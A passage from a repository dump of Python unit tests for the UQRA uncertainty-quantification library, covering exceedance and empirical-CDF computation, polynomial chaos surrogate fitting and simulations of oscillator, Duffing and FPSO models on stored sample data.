# print(res2.shape)
# print(np.around(res2[0],2))
# print(np.around(res2[1],2))
# orders = [4] ## mcs
orders = range(3,10) ## quad
repeat = range(10)
data_dir_out= '/Users/jinsongliu/External/MUSE_UQ_DATA/linear_oscillator/Data'
data_dir_in = '/Users/jinsongliu/External/MUSE_UQ_DATA/linear_oscillator/Data'
for iorder in orders:
for r in repeat:
filename = 'DoE_IS_McRE6R{:d}_weight.npy'.format(r)
weights = np.load(os.path.join(data_dir_out, filename))
##>>> MCS results from true model
# filename = 'DoE_IS_McRE{:d}R{:d}_stats.npy'.format(iorder,r)
# data_out = np.load(os.path.join(data_dir_out, filename))
# y = np.squeeze(data_out[:,4,:]).T
filename = 'DoE_IS_QuadHem{:d}_PCE_pred_E6R{:d}.npy'.format(iorder, r)
data_out = np.load(os.path.join(data_dir_out, filename))
y = data_out
print(y.shape)
# filename = 'DoE_McRE{:d}R{:d}_stats.npy'.format(iorder, r)
# data_out = np.load(os.path.join(data_dir, filename))
# y = np.squeeze(data_out[:,4,:]).T
print(r' - exceedance for y: {:s}'.format(filename))
for i, iy in enumerate(y):
print('iy.shape = {}'.format(iy.shape))
print('weights.shape = {}'.format(weights.shape))
res = stats.cumfreq(iy,numbins=iy.size, weights=weights)
cdf_x = res.lowerlimit + np.linspace(0, res.binsize*res.cumcount.size, res.cumcount.size)
cdf_y = res.cumcount/res.cumcount[-1]
excd = np.array([cdf_x, cdf_y])
np.save(os.path.join(data_dir_out,filename[:-4]+'_y{:d}_ecdf'.format(i)), excd)
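# Note: the weighted empirical CDF above normalizes the weighted cumulative counts,
# cdf_y = cumcount / cumcount[-1], over the bin edges cdf_x; the corresponding weighted
# exceedance probability is simply 1 - cdf_y on the same grid.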
def test_exceedance(self):
print('========================TESTING: Linear Oscillator =======================')
# print('Testing: 1D')
# a = np.random.randint(0,10,size=10)
# print(a)
# a_excd=uqhelpers.get_exceedance_data(a, prob=1e-3)
# print('1D: return_index=False')
# print(a_excd)
# a_excd=uqhelpers.get_exceedance_data(a, prob=1e-3, return_index=True)
# print('1D: return_index=True')
# print(a_excd)
# print('Testing: 2D')
# a = np.random.randint(0,10,size=(2,10))
# print(a)
# a_excd=uqhelpers.get_exceedance_data(a, prob=1e-3)
# print('2D: isExpand=False, return_index=False')
# print(a_excd)
# a_excd=uqhelpers.get_exceedance_data(a, prob=1e-3, return_index=True)
# print('2D: isExpand=False, return_index=True')
# print(a_excd)
# a_excd=uqhelpers.get_exceedance_data(a, prob=1e-3, isExpand=True, return_index=True)
# print('2D: isExpand=True, return_index=True')
# print(a_excd)
# # return_period= [1,5,10]
# # prob_fails = [1/(p *365.25*24*3600/1000) for p in return_period]
# return_period= [1]
# prob_fails = [1e-5]
# quad_orders = range(3,10)
# mcs_orders = [6]
# repeat = range(10)
# orders = mcs_orders
# # orders = quad_orders
# return_all = False
# data_dir_out= '/Users/jinsongliu/External/MUSE_UQ_DATA/linear_oscillator/Data'
# data_dir_in = '/Users/jinsongliu/External/MUSE_UQ_DATA/linear_oscillator/Data'
# # data_dir_out= '/Users/jinsongliu/External/MUSE_UQ_DATA/BENCH4/Data'
# # data_dir_in = '/Users/jinsongliu/External/MUSE_UQ_DATA/BENCH4/Data'
# # data_dir_in = '/Users/jinsongliu/Google Drive File Stream/My Drive/MUSE_UQ_DATA/linear_oscillator'
# for ipf, ip in zip(prob_fails, return_period):
# print('Target exceedance prob : {:.1e}'.format(ipf))
# for iorder in orders:
# for r in repeat:
# ## input
# filename = 'DoE_McRE6R{:d}.npy'.format(r)
# # filename = 'DoE_McRE7R{:d}.npy'.format(r)
# data_in = np.load(os.path.join(data_dir_in, filename)) # [u1, u2,..., x1, x2...]
# ##>>> MCS results from surrogate model
# filename = 'DoE_QuadHem{:d}_GPR_pred_E6R{:d}.npy'.format(iorder, r)
# filename = 'DoE_QuadHem{:d}R24_mPCE_Normal_pred_E7R{:d}.npy'.format(iorder, r)
# filename = 'DoE_QuadHem{:d}_PCE_Normal_pred_E7R{:d}.npy'.format(iorder, r)
# data_out = np.load(os.path.join(data_dir_out, filename))
# y = data_out
# ##>>> MCS results from true model
# ## bench 4
# # filename = 'DoE_McRE{:d}R{:d}_y_Normal.npy'.format(iorder,r)
# # data_out = np.load(os.path.join(data_dir_out, filename))
# # y = data_out.reshape(1,-1)
# filename = 'DoE_McRE6R{:d}_stats.npy'.format(r)
# data_out = np.load(os.path.join(data_dir_out, filename))
# y = np.squeeze(data_out[:,4,:]).T
# print(y.shape)
# # filename = 'DoE_McRE{:d}R{:d}_stats.npy'.format(iorder, r)
# # data_out = np.load(os.path.join(data_dir, filename))
# # y = np.squeeze(data_out[:,4,:]).T
# print(r' - exceedance for y: {:s}'.format(filename))
# for i, iy in enumerate(y):
# data_ = np.vstack((iy.reshape(1,-1), data_in))
# iexcd = uqhelpers.get_exceedance_data(data_, ipf, isExpand=True, return_all=return_all)
# return_all_str = '_all' if return_all else ''
# np.save(os.path.join(data_dir_out,filename[:-4]+'_y{:d}_ecdf_P{:d}{}'.format(i, ip, return_all_str )), iexcd)
# data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/BENCH4/Data'
# p = 1e-5
# print('Target exceedance prob : {:.1e}'.format(p))
# # error_name = 'None'
# # error_name = 'Normal'
# error_name = 'Gumbel'
# for r in range(10):
# # filename = 'DoE_McRE7R{:d}_y_{:s}.npy'.format(r, error_name.capitalize())
# # filename = 'DoE_QuadHem5_PCE_{:s}_pred_r{:d}.npy'.format(error_name.capitalize(), r)
# filename = 'DoE_QuadHem5R24_mPCE_{:s}_pred_r{:d}.npy'.format(error_name.capitalize(), r)
# data_set = np.load(os.path.join(data_dir, filename))
# y = np.squeeze(data_set)
# print(r' - exceedance for y: {:s}'.format(filename))
# y_excd=uqhelpers.get_exceedance_data(y, p)
# np.save(os.path.join(data_dir, filename[:-4]+'_ecdf_pf5.npy'), y_excd)
data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/Ishigami/Data'
excd_prob= [1e-6]
print('Target exceedance prob : {}'.format(excd_prob))
y_excd = []
for iexcd_prob in excd_prob:
y = []
for r in range(10):
filename = 'DoE_McsE6R{:d}_PCE9_OLS.npy'.format(r)
print(r' - exceedance for y: {:s}'.format(filename))
data_set = np.load(os.path.join(data_dir, filename))
y.append(data_set)
y_ecdf = uqhelpers.ECDF(np.array(y).T, alpha=iexcd_prob, is_expand=False)
filename = os.path.join(data_dir,'DoE_McsE6_PCE9_OLS_pf6_ecdf.pickle')
with open(filename, 'wb') as handle:
pickle.dump(y_ecdf, handle)
y_excd = []
for iexcd_prob in excd_prob:
y = []
for r in range(10):
filename = 'DoE_McsE6R{:d}_PCE9_LASSOLARS.npy'.format(r)
print(r' - exceedance for y: {:s}'.format(filename))
data_set = np.load(os.path.join(data_dir, filename))
y.append(data_set)
y_ecdf = uqhelpers.ECDF(np.array(y).T, alpha=iexcd_prob, is_expand=False)
filename = os.path.join(data_dir,'DoE_McsE6_PCE9_LASSOLARS_pf6_ecdf.pickle')
with open(filename, 'wb') as handle:
pickle.dump(y_ecdf, handle)
y_excd = []
for iexcd_prob in excd_prob:
y = []
for r in range(10):
filename = 'DoE_McsE6R{:d}_PCE9_OLSLARS.npy'.format(r)
print(r' - exceedance for y: {:s}'.format(filename))
data_set = np.load(os.path.join(data_dir, filename))
y.append(data_set)
y_ecdf = uqhelpers.ECDF(np.array(y).T, alpha=iexcd_prob, is_expand=False)
filename = os.path.join(data_dir,'DoE_McsE6_PCE9_OLSLARS_pf6_ecdf.pickle')
with open(filename, 'wb') as handle:
pickle.dump(y_ecdf, handle)
def test_bench4(self):
print('========================TESTING: BENCH 4 =======================')
data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/BENCH4/Data'
model_name = 'BENCH4'
# ### grid points
# x = np.linspace(-10,20,600).reshape((1,-1))
# solver = uqra.Solver(model_name, x)
# y = solver.run()
# res = np.concatenate((x,y), axis=0)
# np.save(os.path.join(data_dir,model_name.lower()), res)
### data from files
for r in range(10):
filename = 'DoE_McRE6R{:d}.npy'.format(r)
data_set = np.load(os.path.join(data_dir, filename))
zeta = data_set[0,:].reshape(1,-1)
x = data_set[1,:].reshape(1,-1)
solver = uqra.Solver(model_name, x)
y = solver.run()
np.save(os.path.join(data_dir,'DoE_McRE6R{:d}_y_None.npy'.format(r)), y)
def test_Solver(self):
x = np.arange(12).reshape(2,-1)
np.random.seed(100)
# x = (Hs,Tp) = np.array((4, 12)).reshape(2,1)
x = (Hs,Tp) = np.arange(12).reshape(2,-1)
solver = uqra.linear_oscillator()
print(solver)
y_raw, y_QoI = solver.run(x)
# print(y_raw.shape)
# print(y_QoI.shape)
# x = np.arange(30).reshape(3,10)
# solver = uqra.Ishigami()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
# x = np.arange(30)
# solver = uqra.xsinx()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
# x = np.arange(30)
# solver = uqra.poly4th()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
# x = np.arange(30).reshape(2,15)
# solver = uqra.polynomial_square_root_function()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
# x = np.arange(30).reshape(2,15)
# solver = uqra.four_branch_system()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
# x = np.arange(30).reshape(2,15)
# solver = uqra.polynomial_product_function()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
### General Solver run testing
# print('========================TESTING: Solver =======================')
# model_name = 'linear_oscillator'
# kwargs = {
# 'time_max' : 100,
# 'dt' : 0.2,
# }
# tmax,dt = 1000, 0.1
# t = np.arange(0,tmax, dt)
# zeta = 0.01
# omega_n = 2 # rad/s
# m = 1
# k = (omega_n/2/np.pi) **2 * m
# c = zeta * 2 * np.sqrt(m * k)
# mck = (m,c,k)
# solver = uqra.Solver(model_name, x)
# y = solver.run(**kwargs)
# data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/linear_oscillator/Data'
# np.save(os.path.join(data_dir,'Kvitebjørn_EC_P{:d}_{:d}'.format(P, nsim)), EC_y)
# ## run solver for EC cases
# P, nsim = 10, 25
# data_dir = '/Users/jinsongliu/BoxSync/MUSELab/uqra/uqra/environment'
# data_set = np.load(os.path.join(data_dir, 'Kvitebjørn_EC_P{:d}.npy'.format(P)))
# EC_x = data_set[2:,:]
# model_name = 'linear_oscillator'
# solver = uqra.Solver(model_name, EC_x)
# EC_y = np.array([solver.run(doe_method = 'EC') for _ in range(nsim)])
# data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/linear_oscillator/Data'
# np.save(os.path.join(data_dir,'Kvitebjørn_EC_P{:d}_{:d}'.format(P, nsim)), EC_y)
# ## run solver for Hs Tp grid points
# nsim = 30
# data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/linear_oscillator/Data'
# filename = 'HsTp_grid118.npy'
# data_set = np.load(os.path.join(data_dir, filename))
# model_name = 'linear_oscillator'
# solver = uqra.Solver(model_name, data_set)
# grid_out = np.array([solver.run(doe_method = 'GRID') for _ in range(nsim)])
# np.save(os.path.join(data_dir,'HsTp_grid118_out'), grid_out)
# data_set = np.load('DoE_McRE3R0.npy')
# x_samples = data_set[2:,:]
# model_name = 'linear_oscillator'
# solver = uqra.Solver(model_name, x_samples)
# kwargs = {'doe_method': 'MCS'}
# samples_y = solver.run(**kwargs )
# np.save('test_linear_oscillator_y', samples_y)
# # filename_tags = ['R0']
# # filename_tags = [itag+'_y' for itag in filename_tags]
# # uqra_dataio.save_data(samples_y, 'test_linear_oscillator', os.getcwd(), filename_tags)
# samples_y_stats = solver.get_stats()
# np.save('test_linear_oscillator_y_stats', samples_y_stats)
# # filename_tags = [itag+'_y_stats' for itag in filename_tags]
# # uqra_dataio.save_data(samples_y_stats, 'test_linear_oscillator', os.getcwd(), filename_tags)
def test_surrogate_model(self):
print('========================TESTING: SurrogateModel.fit(), ~Normal =======================')
solver1 = lambda x: x
solver2 = lambda x: x**2 + 1
solver3 = lambda x: x**3 + x**2 + x + 3
solver4 = lambda x: cp.Gamma(1,1).inv(cp.Normal(0,1).cdf(x))
solver5 = lambda x: cp.Gamma(1,1).inv(cp.Gamma(1,1).cdf(x))
upper_tail_probs= [0.999,0.9999,0.99999]
moment2cal = [1,2,3,4]
metrics2cal = [ 'explained_variance_score', 'mean_absolute_error', 'mean_squared_error',
'median_absolute_error', 'r2_score', 'r2_score_adj', 'moment', 'mquantiles']
sample_weight = None
multioutput = 'uniform_average'
# squared = True
solvers2test= [solver1,solver2,solver3, solver4, solver5]
solver_strs = ['x', '1 + x**2', '3 + x + x**2 + x**3', 'Gamma(1,1), Hermite', 'Gamma(1,1), Optimal']
poly_orders = range(2,5)
dist_zeta = cp.Normal()
dist_x = cp.Normal()
fit_method = 'GLK'
for isolver , isolver_str in zip(solvers2test, solver_strs):
for ipoly_order in poly_orders:
# uqra.blockPrint()
doe = uqra.QuadratureDesign(ipoly_order+1, ndim = 1, dist_names=['normal'])
doe.samples()
doe.x = doe.u
train_y = np.squeeze(isolver(doe.x))
train_y = np.array([train_y,train_y]).T
pce_model = uqra.PCE(ipoly_order, dist_zeta)
print(len(pce_model.basis[0]))
pce_model.fit(doe.u, train_y, w=doe.w, fit_method=fit_method)
pce_model.predict(doe.u, train_y, metrics=metrics2cal, prob=upper_tail_probs, moment=moment2cal, sample_weight=sample_weight, multioutput=multioutput)
# pce_model.fit(x_train, y_train, weight=x_weight)
# uqra.enablePrint()
# pce_model_scores = pce_model.score(x_train, y_train, metrics=metrics, moment=np.arange(1,5))
# print('Target: {}'.format(isolver_str))
# for i, ipoly_coeffs in enumerate(pce_model.poly_coeffs):
# print('{:<6s}: {}'.format('uqra'*(i==0), np.around(ipoly_coeffs,4)))
def test_LassoLars(self):
from sklearn import linear_model
from sklearn.linear_model import LassoCV, LassoLarsCV, LassoLarsIC, LassoLars
from sklearn import datasets
solver3 = lambda x: x**4 + x**2 + 3
np.random.seed(100)
dist_u = cp.Normal()
u_samples = dist_u.sample(1000)
y_samples = solver3(u_samples)
print('y mean: {}'.format(np.mean(y_samples)))
pce_model = uqra.PCE(10,dist_u)
pce_model.fit(u_samples, y_samples, method='LassoLars')
# print(pce_model.active_)
# print(pce_model.metamodels)
y_pred = pce_model.predict(u_samples.reshape(1,-1))
print(y_pred[:4])
pce_model.fit(u_samples, y_samples, method='OlsLars')
# print(pce_model.active_)
# print(pce_model.metamodels)
y_pred = pce_model.predict(u_samples.reshape(1,-1))
print(y_pred[:4])
def test_Kvitebjorn(self):
print('========================TESTING: Kvitebjorn =======================')
data_dir = '/Users/jinsongliu/BoxSync/MUSELab/uqra/uqra/environment'
# hs1 = np.linspace(0,2.9,291)
# hs2 = np.linspace(2.90,20, 1711)
# hs = np.hstack((hs1, hs2))
# hs_pdf = Kvitebjorn.hs_pdf(hs)
# np.save(os.path.join(data_dir, 'Kvitebjorn_hs'), np.vstack((hs, hs_pdf)))
# n = 1e6
# samples_x = Kvitebjorn.samples(n)
# np.save(os.path.join(data_dir, 'Kvitebjorn_samples_n'), samples_x)
# return EC from Kvitebjorn
P = 10
EC_samples = Kvitebjorn.EC(P)
np.save(os.path.join(data_dir, 'Kvitebjorn_EC_P{:d}'.format(P)), EC_samples)
# ## test cdf method for Kvitebjørn
# u = np.array([np.linspace(0,0.99999,11), np.linspace(0,0.99999,11)])
# x = Kvitebjorn.samples(u)
# u_= Kvitebjorn.cdf(x)
# print(np.around(u,2))
# print(np.around(x,2))
# print(np.around(u_,2))
# print('========================TESTING: SurrogateModel.fit(), Generalized ====================')
# gpce_dist_to_test = [cp.Normal(), cp.Normal(2,3), cp.Gamma(1,1), cp.Beta(1,1)]
# gpce_opt_dist = [cp.Normal(), cp.Normal(), cp.Gamma(1,1), cp.Beta(1,1)]
# gpce_opt_rule = ['hem', 'hem', 'lag', 'jacobi']
# npoly_orders = range(2,5)
# dist_zeta0 = cp.Normal()
# for i, igpce_dist in enumerate(gpce_dist_to_test):
# dist_zeta1 = gpce_opt_dist[i]
# print('>> Testing # {:d}: gpce: {}, zeta0: {} , zeta1: {}'.format(i, igpce_dist, dist_zeta0, dist_zeta1 ))
# for ipoly_order in npoly_orders:
# print(' Polynomial order: {:d}'.format(ipoly_order))
# ## gPCE with hermite chaos
# uqra.blockPrint()
# quad_doe = uqra.DoE('QUAD', 'hem', [ipoly_order+1], dist_zeta0)
# samples_zeta= quad_doe.get_samples()
# zeta_cor, zeta_weight = samples_zeta[0]
# x_cor = igpce_dist.inv(dist_zeta0.cdf(zeta_cor))
# zeta_poly, zeta_norms = cp.orth_ttr(ipoly_order, dist_zeta0, retall=True)
# x_hat,coeffs = cp.fit_quadrature(zeta_poly, zeta_cor, zeta_weight, np.squeeze(x_cor), retall=True)
# uqra.enablePrint()
# print('\t Hermite: {}'.format( np.around(coeffs,4)))
# ## gPCE with optimal chaos
# uqra.blockPrint()
# quad_doe = uqra.DoE('QUAD', gpce_opt_rule[i], [ipoly_order+1], dist_zeta1)
# samples_zeta= quad_doe.get_samples()
# zeta_cor, zeta_weight = samples_zeta[0]
# x_cor = igpce_dist.inv(dist_zeta1.cdf(zeta_cor))
# zeta_poly, zeta_norms = cp.orth_ttr(ipoly_order, dist_zeta1, retall=True)
# x_hat,coeffs = cp.fit_quadrature(zeta_poly, zeta_cor, zeta_weight, np.squeeze(x_cor), retall=True)
# uqra.enablePrint()
# print('\t Optimal: {}'.format( np.around(coeffs,4)))
def test_surrogate_model_scores(self):
print('========================TESTING: SurrogateModel.scores() =======================')
def test_absolute_truth_and_meaning(self):
assert True
def test_acfPsd(self):
## refer to file test_acfPsd.py
pass
def test_gen_gauss_time_series(self):
## refer to file test_gen_gauss_time_series
pass
def test_sdof_var(self):
## refer to file: test_sdof_var
pass
def test_poly5(self):
## refer to file: test_poly5
pass
def test_solver(self):
## refer to file: test_solver
pass
if __name__ == '__main__':
unittest.main()
```
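The `test_gauss_quadrature` case above compares probabilists' (Hermite-e) and physicists' (Hermite) Gauss nodes. The two rules are related by the change of variables x = sqrt(2)*t, so their nodes and weights differ by a factor of sqrt(2). A minimal standalone check of that relation (using only NumPy, independent of UQRA) is sketched below.

```python
import numpy as np

for order in range(2, 9):
    x_e, w_e = np.polynomial.hermite_e.hermegauss(order)  # probabilists', weight exp(-x^2/2)
    x_p, w_p = np.polynomial.hermite.hermgauss(order)     # physicists',  weight exp(-x^2)
    assert np.allclose(x_e, np.sqrt(2) * x_p)              # nodes scale by sqrt(2)
    assert np.allclose(w_e, np.sqrt(2) * w_p)              # weights scale by sqrt(2)
    # sanity check: the probabilists' rule reproduces E[X^2] = 1 for X ~ N(0,1)
    assert np.isclose(np.sum(w_e * x_e**2) / np.sum(w_e), 1.0)
```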
#### File: UQRA/tests/test_Solver.py
```python
import uqra, unittest,warnings,os, sys
from tqdm import tqdm
import numpy as np, scipy as sp
from uqra.solver.PowerSpectrum import PowerSpectrum
from uqra.environment.Kvitebjorn import Kvitebjorn as Kvitebjorn
import uqra.utilities.helpers as uqhelper
from sklearn import datasets
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import KFold
import pickle
import scipy.stats as stats
import scipy.io
import multiprocessing as mp
warnings.filterwarnings(action="ignore", module="scipy", message="^internal gelsd")
sys.stdout = uqra.utilities.classes.Logger()
data_dir = '/Users/jinsongliu/BoxSync/MUSELab/uqra/examples/JupyterNotebook'
class BasicTestSuite(unittest.TestCase):
"""Basic test cases."""
def test_sparse_poly(self):
print('========================TESTING: sparse poly =======================')
ndim = 1
deg = 4
poly = uqra.Legendre(d=ndim, deg=deg)
coef = [0,0,0,1,0]
solver = uqra.sparse_poly(poly, sparsity=4, coef=coef)
# x = np.random.normal(size=(ndim, 1000))
x = np.arange(10)
y = solver.run(x)
Leg2 = lambda x: 0.5*(3*x**2 - 1)/(poly.basis_norms[2])**0.5
Leg3 = lambda x: 0.5*(5*x**3 - 3*x)/(poly.basis_norms[3])**0.5
assert solver.ndim == ndim
assert solver.deg == deg
assert solver.coef == coef
assert np.array_equal(y,Leg3(x))
u = np.random.uniform(0,1,size=(2,100))
x = solver.map_domain(u, [stats.uniform(0,1),]*solver.ndim)
print(np.max(x))
print(np.min(x))
def test_bench4(self):
print('========================TESTING: BENCH 4 =======================')
data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/BENCH4/Data'
model_name = 'BENCH4'
# ### grid points
# x = np.linspace(-10,20,600).reshape((1,-1))
# solver = uqra.Solver(model_name, x)
# y = solver.run()
# res = np.concatenate((x,y), axis=0)
# np.save(os.path.join(data_dir,model_name.lower()), res)
### data from files
for r in range(10):
filename = 'DoE_McRE6R{:d}.npy'.format(r)
data_set = np.load(os.path.join(data_dir, filename))
zeta = data_set[0,:].reshape(1,-1)
x = data_set[1,:].reshape(1,-1)
solver = uqra.Solver(model_name, x)
y = solver.run()
np.save(os.path.join(data_dir,'DoE_McRE6R{:d}_y_None.npy'.format(r)), y)
def test_linear_oscillator(self):
random_seed = 100
np.random.seed(random_seed)
seeds_st = np.random.randint(0, int(2**31-1), size=20)
out_responses = [2]
out_stats = ['absmax']
m=1
c=0.1/np.pi
k=1.0/np.pi/np.pi
m,c,k = [stats.norm(m, 0.05*m), stats.norm(c, 0.2*c), stats.norm(k, 0.1*k)]
# env = uqra.Environment([stats.uniform, stats.norm])
env = uqra.Environment([2,])
# env = Kvitebjorn()
solver = uqra.linear_oscillator(m=m,c=c,k=k,excitation='spec_test1', environment=env, t=1000, t_transit=10,
out_responses=out_responses, out_stats=out_stats)
samples= solver.generate_samples(100)
y = solver.run(samples, seeds_st=seeds_st[:5] )
# for r in range(2):
# # filename = r'DoE_McsE6R{:d}.npy'.format(r)
# # data_dir = r'/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/Samples/MCS/Uniform/'
# # u = np.load(os.path.join(data_dir, filename))[:solver.ndim,:]
# # x = solver.map_domain(u, [stats.uniform(-1,2),] * solver.ndim)
# # print(np.mean(u, axis=1))
# # print(np.std(u, axis=1))
# # print(np.mean(x, axis=1))
# # print(np.std(x, axis=1))
# y_QoI = solver.run(samples, random_seed=random_seed)
# print(np.array(y_QoI).shape)
print(y.shape)
def test_surge(self):
random_seed = 100
out_responses = [2,3]
out_stats = ['absmax', 'mean']
m=1e8
k=280000
c=0.05*2*np.sqrt(k*m)
ltf = np.load('/Users/jinsongliu/BoxSync/MUSELab/uqra/uqra/solver/FPSO_ltf.npy')
qtf = np.load('/Users/jinsongliu/BoxSync/MUSELab/uqra/uqra/solver/FPSO_qtf.npy')
rao_= np.load('/Users/jinsongliu/BoxSync/MUSELab/uqra/uqra/solver/FPSO_RAO.npy')
print(ltf.shape)
print(qtf.shape)
print(rao_.shape)
# m,c,k = [stats.norm(m, 0.05*m), stats.norm(c, 0.2*c), stats.norm(k, 0.1*k)]
# env = uqra.Environment([stats.uniform, stats.norm])
# env = uqra.Environment([2,])
env = Kvitebjorn()
solver = uqra.surge_model(m=m,c=c,k=k, environment=env, t=4000, t_transit=100, dt=0.1, ltf=ltf[:2],
out_responses=out_responses, out_stats=out_stats)
samples= solver.generate_samples(10)
y = solver.run(samples)
# for r in range(2):
# # filename = r'DoE_McsE6R{:d}.npy'.format(r)
# # data_dir = r'/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/Samples/MCS/Uniform/'
# # u = np.load(os.path.join(data_dir, filename))[:solver.ndim,:]
# # x = solver.map_domain(u, [stats.uniform(-1,2),] * solver.ndim)
# # print(np.mean(u, axis=1))
# # print(np.std(u, axis=1))
# # print(np.mean(x, axis=1))
# # print(np.std(x, axis=1))
# y_QoI = solver.run(samples, random_seed=random_seed)
# print(np.array(y_QoI).shape)
print(y.shape)
def test_four_branch(self):
np.random.seed(100)
solver = uqra.four_branch_system()
data_dir_src = '/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/Samples/MCS/Normal/'
data_dir_destn = r'/Volumes/External/MUSE_UQ_DATA/Four_branch_system/Data'
for r in tqdm(range(10), ascii=True, desc=' -'):
filename = 'DoE_McsE6R{:d}.npy'.format(r)
u = np.load(os.path.join(data_dir_src, filename))[:solver.ndim, :]
x = solver.map_domain(u, [stats.norm(0,1),] * solver.ndim)
if not np.array_equal(u, x):
print(np.max(abs(u-x), axis=1))
y = solver.run(x).reshape(1,-1)
data = np.vstack((u,x,y))
np.save(os.path.join(data_dir_destn, filename), data)
def test_franke(self):
np.random.seed(100)
solver = uqra.franke()
data_dir_src = '/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/Samples/MCS/Uniform/'
data_dir_destn = r'/Volumes/External/MUSE_UQ_DATA/Franke/Data'
for r in tqdm(range(10), ascii=True, desc=' -'):
filename = 'DoE_McsE6R{:d}.npy'.format(r)
u = np.load(os.path.join(data_dir_src, filename))[:solver.ndim, :]
x = solver.map_domain(u, [stats.uniform(-1,2),] * solver.ndim)
if not np.array_equal(u, x):
print(np.max(abs(u-x), axis=1))
y = solver.run(x).reshape(1,-1)
data = np.vstack((u,x,y))
np.save(os.path.join(data_dir_destn, filename), data)
def test_duffing(self):
# f = lambda t: 8 * np.cos(0.5 * t)
np.random.seed(100)
dt = 0.01
out_responses = [1,2]
nsim = 1
out_stats = ['mean', 'std', 'skewness', 'kurtosis', 'absmax', 'absmin']
# solver = uqra.duffing_oscillator(m=1,c=0.2*np.pi,k=4*np.pi**2,s=np.pi**2, out_responses=out_responses, out_stats=out_stats, tmax=18000, dt=dt,y0=[1,0])
f = lambda t: 0.39 * np.cos(1.4 * t)
solver = uqra.duffing_oscillator(m=1,c=0.1,k=-1,s=1,excitation=f, out_responses=out_responses, out_stats=out_stats, tmax=18000, dt=dt,y0=[0,0])
x = solver.generate_samples(1)
print(solver)
print(x)
y = solver.run(x,return_raw=True)
# data_dir_src = '/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/Samples/Kvitebjorn/Normal/'
# data_dir_destn = r'/Volumes/External/MUSE_UQ_DATA/Duffing/Data/'
# for r in range(1):
# data = []
# filename = 'DoE_McsE6R{:d}.npy'.format(r)
# x = np.load(os.path.join(data_dir_src, filename))[:solver.ndim, :]
# # x = solver.map_domain(u, [stats.norm(0,1),] * solver.ndim)
# # y_raw, y_QoI = zip(*[solver.run(x.T) for _ in range(nsim)])
# y_raw, y_QoI = solver.run(x.T)
# # np.save('duffing_time_series_{:d}'.format(r), y_raw)
# filename = 'DoE_McsE6R{:d}_stats'.format(r)
# np.save(os.path.join(data_dir_destn, filename), y_QoI)
def test_FPSO(self):
Kvitebjorn = uqra.environment.Kvitebjorn()
data_dir_samples= r'/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/Samples'
solver = uqra.FPSO() ## instantiate here so solver.nickname is defined; a seeded FPSO is re-created inside the MCS loop below
data_dir_result = os.path.join(r'/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/', solver.nickname)
# data_dir_samples= r'/home/jinsong/Documents/MUSE_UQ_DATA/Samples'
# data_dir_result = r'/home/jinsong/Documents/MUSE_UQ_DATA/FPSO_SDOF'
# ------------------------ Basic Check ----------------- ###
# solver = uqra.FPSO()
# x = np.array([2,4]).reshape(2,-1)
# y = solver.run(x)
# print('Hs = {}, Tp={}'.format(np.around(x[0]), np.around(x[1])))
## ------------------------ LHS ----------------- ###
# n_initial = 20
# solver = uqra.FPSO(phase=np.arange(20))
# Kvitebjorn= uqra.environment.Kvitebjorn()
# doe = uqra.LHS([stats.norm(),] * solver.ndim)
# u_lhs = doe.samples(size=n_initial, loc=0, scale=1, random_state=100)
# x_lhs = Kvitebjorn.ppf(stats.norm.cdf(u_lhs))
# y_lhs = solver.run(x_lhs)
# print(y_lhs.shape)
# data_lhs = np.concatenate((u_lhs, x_lhs, y_lhs), axis=0)
# np.save(os.path.join(data_dir_result, '{:s}_DoE_Lhs.npy'), data_lhs)
## ------------------------ MCS ----------------- ###
# MCS for DoE_McsE7R0
n = int(1e7)
for s in range(10):
solver = uqra.FPSO(random_state = s)
data_mcs_u = np.load(os.path.join(data_dir_samples, 'MCS', 'Norm', 'DoE_McsE7R{:d}.npy'.format(s)))
data_mcs_u = data_mcs_u[:solver.ndim, :n]
data_mcs_x = Kvitebjorn.ppf(stats.norm.cdf(data_mcs_u))
y = solver.run(data_mcs_x, verbose=True)
data = np.concatenate((data_mcs_u, data_mcs_x, y.reshape(1,-1)))
np.save(os.path.join(data_dir_result, '{:s}_McsE7R{:d}.npy'.format(solver.nickname,s)), data)
# ------------------------ Environmental Contour ----------------- ###
# solver = uqra.FPSO(random_state = np.arange(20))
# data_ec = np.load('/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/Samples/Kvitebjorn/Kvitebjorn_EC_50yr.npy')
# EC_u, EC_x = data_ec[:2], data_ec[2:]
# EC_y = solver.run(EC_x, verbose=True)
# EC2D_median = np.median(EC_y, axis=0)
# EC2D_data = np.concatenate((EC_u,EC_x,EC2D_median.reshape(1,-1)), axis=0)
# y50_EC_idx = np.argmax(EC2D_median)
# y50_EC = EC2D_data[:,y50_EC_idx]
# print('Extreme response from EC:')
# print(' {}'.format(y50_EC))
# np.save(os.path.join(data_dir_result, '{:s}_Kvitebjorn_EC2D_50yr.npy'.format(solver.nickname) ), EC2D_data)
# np.save(os.path.join(data_dir_result, '{:s}_Kvitebjorn_EC2D_50yr_y.npy'.format(solver.nickname)), EC_y)
## ------------------------ Environmental Contour ----------------- ###
# solver = uqra.FPSO(phase=np.arange(21))
# dataset = np.load('/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/FPSO_SDOF/Data/FPSO_Test_McsE7R0.npy')
# u, x = dataset[:2], dataset[2:4]
# y = solver.run(x, verbose=True)
# try:
# data = np.concatenate((u,x,y), axis=0)
# except ValueError:
